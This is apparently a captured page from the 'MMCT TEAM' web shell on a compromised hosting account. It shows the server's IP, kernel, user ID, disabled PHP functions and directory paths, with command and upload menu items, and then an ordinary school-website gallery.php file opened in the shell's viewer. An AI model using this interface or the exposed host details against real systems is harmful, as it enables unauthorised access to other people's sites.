MMCT TEAM
Server IP : 2a02:4780:3:2287:0:3736:a38e:8  /  Your IP : 216.73.217.106
Web Server : LiteSpeed
System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64
User : u926327694 ( 926327694)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail, proc_open
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u926327694/domains/gesnavachetanschool.in/../petsisguledgudd.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u926327694/domains/gesnavachetanschool.in/../petsisguledgudd.com/public_html/gallery.php
<?php include "header.php"; ?>

    <!-- ==============================================
    ** Inner Banner **
    =================================================== -->
    <div class="inner-banner blog">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="content">
                        <h1 style="color:#f47435">Gallery</h1>
                    </div>
                </div>
            </div>
        </div>
    </div>

     <?php
include 'admin/pages/config/config.php';
// Connect to MySQL
// MySQL query that selects all the images



?>





     <?php
$stmt =mysqli_query($con,"SELECT * FROM `gallery` ORDER BY `id` DESC");

?>
    <!-- ==============================================
    ** News & Events **
    =================================================== -->
    <section class="campus-tour padding-lg" style="padding-top: 5px;padding-bottom: 5px;">
        <div class="container">
            <ul class="gallery clearfix" >
                <?php 
                foreach ($stmt as $name) {
        
      ?>  
                <li>
                <div class="overlay">
                    
                    <a class="galleryItem" href="<?php echo "/admin/pages/Admin/".$name['photo']; ?>" ><span class="icon-enlarge-icon"></span></a>
                </div>
                <figure><img style="height:170px" src="<?php echo "/admin/pages/Admin/".$name['photo']; ?>" class="img-responsive" alt=""></figure>
            </li>
                <?php 
                
                }
                ?>
            </ul>
           
        </div>
    </section>
  <?php include "footer.php"; ?>
</body>
</html>

MMCT - 2023